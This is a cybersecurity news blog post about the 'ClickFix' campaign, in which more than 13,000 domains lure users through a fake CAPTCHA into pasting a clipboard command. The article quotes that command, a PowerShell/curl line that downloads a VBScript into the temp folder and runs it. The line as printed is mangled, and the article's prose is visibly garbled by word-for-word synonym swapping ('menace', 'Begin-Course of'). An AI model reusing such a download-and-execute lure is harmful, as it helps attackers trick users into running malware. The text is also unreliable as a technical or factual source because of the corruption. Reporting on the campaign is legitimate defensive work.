Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Registered 13,000+ Unique Domains and Leverages Cloudflare to Launch Clickfix Attacks

Posted on October 15, 2025October 15, 2025 By CWS

In mid-2025, Lab539 researchers noticed an surprising surge in a novel browser-based malware marketing campaign dubbed “ClickFix.”

Rising quietly in July, the menace rapidly expanded its attain by registering over 13,000 distinctive domains designed to lure customers into executing malicious instructions on their very own units.

The assault leverages compromised or low-cost internet hosting infrastructure, together with a good portion behind Cloudflare, to ship payloads through deceptively benign internet prompts.

Customers encountering these websites are first challenged with a CAPTCHA earlier than being instructed to run a command from their clipboard, granting attackers the flexibility to deploy arbitrary scripts or executables.

Initially, the quantity of ClickFix domains appeared unremarkable amid the huge sea of adversary exercise.

Nevertheless, by mid-August, a outstanding spike raised alarms throughout a number of threat-intelligence platforms.

Lab539 analysts famous the sudden proliferation of front-end websites that frontload malware supply below the guise of “verification” steps, an indicator that distinguishes ClickFix from extra conventional phishing or watering-hole assaults.

The dimensions of area registration recommended an automatic provisioning pipeline, doubtless fueled by pay-as-you-go registrar providers and resold internet hosting, relatively than the handbook setup favored by superior persistent menace actors.

Regardless of Cloudflare’s dominance amongst internet hosting suppliers, accounting for about 24% of noticed ClickFix domains, the marketing campaign’s lengthy tail of almost 500 different suppliers reveals a strategic use of numerous infrastructure to evade easy blocklists.

Regional VPS providers in the US, Germany, Indonesia, and Brazil characteristic prominently, reflecting each world distribution and opportunistic compromise of third-party servers.

In lots of circumstances, attackers repurpose stale or misconfigured subdomains—resembling decades-old educational or municipal hosts—to mix malicious site visitors with reliable DNS information.

ClickFix immediate encountered by victims (Supply – Lab539)

An infection Mechanism and Payload Supply

The core an infection mechanism depends on leveraging the browser’s clipboard API to plant a command that the person unwittingly pastes right into a terminal.

As soon as a CAPTCHA completes, the location writes a PowerShell command sequence like the next to the clipboard:-

cmd /c begin /min powershell -Command curl.exe -s -o $env:TEMPcaptcha.vbs; Begin-Course of $env:TEMPcaptcha.vbs

This single line downloads and executes a VBScript payload with out additional person interplay, exemplifying the marketing campaign’s emphasis on social engineering over exploit chaining.

Variations embody direct executable downloads and obfuscated scripts, indicating a number of operators using the ClickFix framework.

The ubiquity of this mechanism underscores how minimal technical sophistication can nonetheless yield large-scale intrusion alternatives when mixed with automated area registration and world internet hosting belongings.

Observe us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Attacks, ClickFix, Cloudflare, Domains, Hackers, Launch, Leverages, Registered, Unique

Post navigation

Previous Post: F5 Breached – Hackers Stole BIG-IP Source Code and Undisclosed Vulnerabilities Data
Next Post: F5 Breach Exposes BIG-IP Source Code — Nation-State Hackers Behind Massive Intrusion

Related Posts

Chinese Hackers Weaponizes Software Vulnerabilities to Compromise Their Targets Cyber Security News
Capita To pay £14 Million For Data Breach Exposes 6.6 Million Users Personal Data Cyber Security News
PyPI Warns of New Phishing Attack Targeting Developers With Fake PyPI site Cyber Security News
Cybercrime-as-a-Service – Countering Accessible Hacking Tools Cyber Security News
CISA Warns of CitrixBleed 2 Vulnerability Exploited in Attacks Cyber Security News
How Winning SOCs Always Stay Ahead of Threats  Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Critical Windows Server WSUS Vulnerability Exploited in the Wild 
  • North Korean Hackers Aim at European Drone Companies
  • In Other News: iOS 26 Deletes Spyware Evidence, Shadow Escape Attack, Cyber Exec Sold Secrets to Russia
  • Toys ‘R’ Us Canada Customer Information Leaked Online
  • Hackers Exploited 73 0-Day Vulnerabilities and Earned $1,024,750

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Critical Windows Server WSUS Vulnerability Exploited in the Wild 
  • North Korean Hackers Aim at European Drone Companies
  • In Other News: iOS 26 Deletes Spyware Evidence, Shadow Escape Attack, Cyber Exec Sold Secrets to Russia
  • Toys ‘R’ Us Canada Customer Information Leaked Online
  • Hackers Exploited 73 0-Day Vulnerabilities and Earned $1,024,750

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News